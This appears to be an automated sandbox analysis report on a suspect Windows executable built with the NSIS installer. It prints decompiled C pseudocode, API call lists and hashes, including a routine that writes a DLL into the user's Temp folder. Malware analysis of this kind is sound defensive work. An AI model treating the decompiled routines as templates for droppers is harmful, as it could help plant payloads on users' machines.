                                                                          0x00405b1f
                                                                          0x00405b0c
                                                                          0x00000000
                                                                          0x00405b0c
                                                                          0x00405ae6
                                                                          0x00405aeb
                                                                          0x00405aee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405afa
                                                                          0x00000000
                                                                          0x00405aba
                                                                          0x00405aca
                                                                          0x00405b25
                                                                          0x00405b25
                                                                          0x00405b28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b28
                                                                          0x00405aa9
                                                                          0x00405aa9
                                                                          0x00405b2a
                                                                          0x00405b2a
                                                                          0x00405b31
                                                                          0x00405b35
                                                                          0x00405b35
                                                                          0x00405b36
                                                                          0x00405b39
                                                                          0x00405b45
                                                                          0x00405b4b
                                                                          0x00405b4d
                                                                          0x00405b6c
                                                                          0x00405b6c
                                                                          0x00000000
                                                                          0x00405b6c
                                                                          0x00405b53
                                                                          0x00405b5c
                                                                          0x00405b5f
                                                                          0x00405b64
                                                                          0x00405b68
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b6f
                                                                          0x00405b6f
                                                                          0x00405b6f
                                                                          0x00405b73
                                                                          0x00405b76
                                                                          0x00405b78
                                                                          0x00405b7c
                                                                          0x00405b82
                                                                          0x00405b82
                                                                          0x00405b7c
                                                                          0x00000000
                                                                          0x00405b76
                                                                          0x00405aa7
                                                                          0x00405bfe
                                                                          0x00405c08
                                                                          0x00405c14
                                                                          0x00405c14
                                                                          0x00000000

                                                                          APIs
                                                                          • SHGetSpecialFolderLocation.SHELL32(00404DB6,74B5EA30,00000006,0042A080,00000000,00404DB6,0042A080,00000000), ref: 00405B45
                                                                          • SHGetPathFromIDListA.SHELL32(74B5EA30,Hyvkfcorf), ref: 00405B53
                                                                          • lstrcatA.KERNEL32(Hyvkfcorf,00000000), ref: 00405B82
                                                                          • lstrlenA.KERNEL32(Hyvkfcorf,00000006,0042A080,00000000,00404DB6,0042A080,00000000,00000000,0041A058,74B5EA30), ref: 00405BD6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                          • String ID: C:\Program Files$CommonFilesDir$Hyvkfcorf$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 4227507514-4117142463
                                                                          • Opcode ID: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
                                                                          • Instruction ID: 13347c9ab72858fb5eaf67a64ac525bbdc509f35e98fc7f159111bcae2296393
                                                                          • Opcode Fuzzy Hash: 69eaa95762ce01c5e718d1e58068cedbee79facb795a7079d17d44c46ab99ceb
                                                                          • Instruction Fuzzy Hash: 0B514471A04A40AADF206B648880B7F3BB4DB55324F24823BF951B92D2C77CB941DF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E004026FA(void* __eflags) {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405554(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054E8(E004059DB("C:\Users\hardz\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a040;
				} else {
					_push(0x40a040);
					E004059DB();
				}
				E00405C17(_t55);
				_t28 = E004056AC(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x42f42c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E0040311B(_t48);
						E004030E9(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							E00402EBD( *((intOrPtr*)(_t60 - 0x20)), _t48, _t58,  *(_t60 - 0x1c));
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E0040568C( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD(0xffffffff,  *(_t60 + 8), _t48, _t48);
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a040;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                                                          0x004026fb
                                                                          0x00402707
                                                                          0x0040270a
                                                                          0x00402711
                                                                          0x00402712
                                                                          0x00402737
                                                                          0x0040273c
                                                                          0x00402714
                                                                          0x00402719
                                                                          0x0040271a
                                                                          0x0040271a
                                                                          0x00402742
                                                                          0x0040274f
                                                                          0x00402757
                                                                          0x0040275a
                                                                          0x00402760
                                                                          0x0040276e
                                                                          0x00402773
                                                                          0x00402777
                                                                          0x0040277a
                                                                          0x00402783
                                                                          0x0040278f
                                                                          0x00402793
                                                                          0x00402796
                                                                          0x004027a0
                                                                          0x004027bf
                                                                          0x004027ac
                                                                          0x004027b4
                                                                          0x004027b7
                                                                          0x004027bc
                                                                          0x004027bc
                                                                          0x004027c6
                                                                          0x004027c6
                                                                          0x004027d8
                                                                          0x004027df
                                                                          0x004027f1
                                                                          0x004027f1
                                                                          0x004027f7
                                                                          0x004027fd
                                                                          0x004027fd
                                                                          0x00402807
                                                                          0x00402808
                                                                          0x0040280c
                                                                          0x0040280e
                                                                          0x00402814
                                                                          0x00402814
                                                                          0x0040281b
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                          • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                          • GlobalFree.KERNEL32 ref: 004027C6
                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                          • GlobalFree.KERNEL32 ref: 004027DF
                                                                          • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                          • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                            • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,obsolete Setup,NSIS Error), ref: 004059E8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                          • API String ID: 3508600917-1331125492
                                                                          • Opcode ID: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
                                                                          • Instruction ID: e918ecff61003bd4e53df21424f32a66ffcc7178d15be7bffdb357a79f3add81
                                                                          • Opcode Fuzzy Hash: 7deaf60bf628365072dd8502dd0ead948c1abb9d8234e3140ea94df3bd8212ec
                                                                          • Instruction Fuzzy Hash: 9C31AEB1C00118BBDF116FA5CD89EAF7A69EF04324B20823AF914B72D1C77C5D419BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405C17, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405C17(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405554(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405513("*?|<>/\":", _t5))) == 0) {
							E0040568C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                          0x00405c19
                                                                          0x00405c21
                                                                          0x00405c35
                                                                          0x00405c35
                                                                          0x00405c3b
                                                                          0x00405c48
                                                                          0x00405c48
                                                                          0x00405c49
                                                                          0x00405c4b
                                                                          0x00405c4f
                                                                          0x00405c51
                                                                          0x00405c5a
                                                                          0x00405c5c
                                                                          0x00405c76
                                                                          0x00405c7e
                                                                          0x00405c7e
                                                                          0x00405c83
                                                                          0x00405c85
                                                                          0x00405c87
                                                                          0x00405c8b
                                                                          0x00405c8c
                                                                          0x00405c8f
                                                                          0x00405c97
                                                                          0x00405c99
                                                                          0x00405c9d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405ca3
                                                                          0x00405ca8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405ca8
                                                                          0x00405cad

                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                                          • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                                          • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                                          • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C17, 00405C18
                                                                          • *?|<>/":, xrefs: 00405C5F
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                          • API String ID: 589700163-489697304
                                                                          • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction ID: b197c2bef29f723973a647164ed9bfba67e7b184e87579fa7c6e082c99ea6b19
                                                                          • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction Fuzzy Hash: B8118F9180DB952DFB3226284D44BBB6F89CB97760F18057BE8C4722C2C67C5C829B6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403E2A, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00403E2A(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                          0x00403e3c
                                                                          0x00403ed0
                                                                          0x00000000
                                                                          0x00403ed0
                                                                          0x00403e4d
                                                                          0x00403e51
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403e57
                                                                          0x00403e60
                                                                          0x00403e63
                                                                          0x00403e63
                                                                          0x00403e69
                                                                          0x00403e6f
                                                                          0x00403e6f
                                                                          0x00403e7b
                                                                          0x00403e81
                                                                          0x00403e88
                                                                          0x00403e8b
                                                                          0x00403e8e
                                                                          0x00403e90
                                                                          0x00403e90
                                                                          0x00403e98
                                                                          0x00403e9e
                                                                          0x00403e9e
                                                                          0x00403ea8
                                                                          0x00403ead
                                                                          0x00403eb0
                                                                          0x00403eb5
                                                                          0x00403eb8
                                                                          0x00403eb8
                                                                          0x00403ec8
                                                                          0x00403ec8
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction ID: f5966fbedea87c62c799fd74794a37596286a0d285d836841829b5ba7487bb7a
                                                                          • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction Fuzzy Hash: 2C215771904744ABC7219F78DD08B5B7FF8AF01715F048A69E855E26D0D738F904CB55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404D7E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E00404D7E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FD(0, _t39, 0x42a080, 0x42a080, _a4);
					}
					_t26 = lstrlenA(0x42a080);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a080);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x42a080;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a080)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a080, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                          0x00404d84
                                                                          0x00404d90
                                                                          0x00404d93
                                                                          0x00404d99
                                                                          0x00404da5
                                                                          0x00404da8
                                                                          0x00404dab
                                                                          0x00404db1
                                                                          0x00404db1
                                                                          0x00404db7
                                                                          0x00404dbf
                                                                          0x00404dc2
                                                                          0x00404ddf
                                                                          0x00404de3
                                                                          0x00404dec
                                                                          0x00404dec
                                                                          0x00404df6
                                                                          0x00404dff
                                                                          0x00404e0b
                                                                          0x00404e12
                                                                          0x00404e16
                                                                          0x00404e19
                                                                          0x00404e2c
                                                                          0x00404e3a
                                                                          0x00404e3a
                                                                          0x00404e3e
                                                                          0x00404e40
                                                                          0x00404e43
                                                                          0x00000000
                                                                          0x00404e43
                                                                          0x00404dc4
                                                                          0x00404dcc
                                                                          0x00404dd4
                                                                          0x00404dda
                                                                          0x00000000
                                                                          0x00404dda
                                                                          0x00404dd4
                                                                          0x00404dc2
                                                                          0x00404e4d

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                                          • lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                                          • lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,74B5EA30), ref: 00404DDA
                                                                          • SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2531174081-0
                                                                          • Opcode ID: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
                                                                          • Instruction ID: 9e4846259fdc63e4b0011bd9da19de3f15789c7d3b7aeff175938ec3064a1f56
                                                                          • Opcode Fuzzy Hash: 51f607469ab4337939dc402639e762edda63f0e7dd75a043e6aaa412e3dde4ad
                                                                          • Instruction Fuzzy Hash: B9218EB1900118BBDB119FA5CC84ADFBFA9EF44354F04807AFA04B6291C7398E40DB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059DB(0x40a040,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a040, 0x40901c);
					lstrcatA(0x40a040,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405CB0( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405723( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                                          0x00401674
                                                                          0x00401684
                                                                          0x00401688
                                                                          0x00401690
                                                                          0x004016a7
                                                                          0x004016af
                                                                          0x004016b8
                                                                          0x004016b8
                                                                          0x004016cb
                                                                          0x004016d7
                                                                          0x004026da
                                                                          0x004016ed
                                                                          0x004016f3
                                                                          0x004016f8
                                                                          0x00000000
                                                                          0x004016f8
                                                                          0x004016cd
                                                                          0x004016cd
                                                                          0x004021e8
                                                                          0x004021e8
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,obsolete Setup,NSIS Error), ref: 004059E8
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,?,000000DF,000000D0), ref: 00401690
                                                                          • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,?,000000DF,000000D0), ref: 0040169A
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,?,000000DF,000000D0), ref: 004016AF
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll,?,000000DF,000000D0), ref: 004016B8
                                                                            • Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ), ref: 00405CBE
                                                                            • Part of subcall function 00405CB0: FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
                                                                            • Part of subcall function 00405CB0: SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
                                                                            • Part of subcall function 00405CB0: FindClose.KERNELBASE(00000000), ref: 00405CDC
                                                                            • Part of subcall function 00405723: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
                                                                            • Part of subcall function 00405723: GetShortPathNameA.KERNEL32 ref: 00405781
                                                                            • Part of subcall function 00405723: GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                            • Part of subcall function 00405723: wsprintfA.USER32 ref: 004057BC
                                                                            • Part of subcall function 00405723: GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
                                                                            • Part of subcall function 00405723: lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
                                                                            • Part of subcall function 00405723: CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
                                                                            • Part of subcall function 00405723: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
                                                                            • Part of subcall function 00405723: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
                                                                            • Part of subcall function 00405723: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829
                                                                          • MoveFileA.KERNEL32 ref: 004016C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
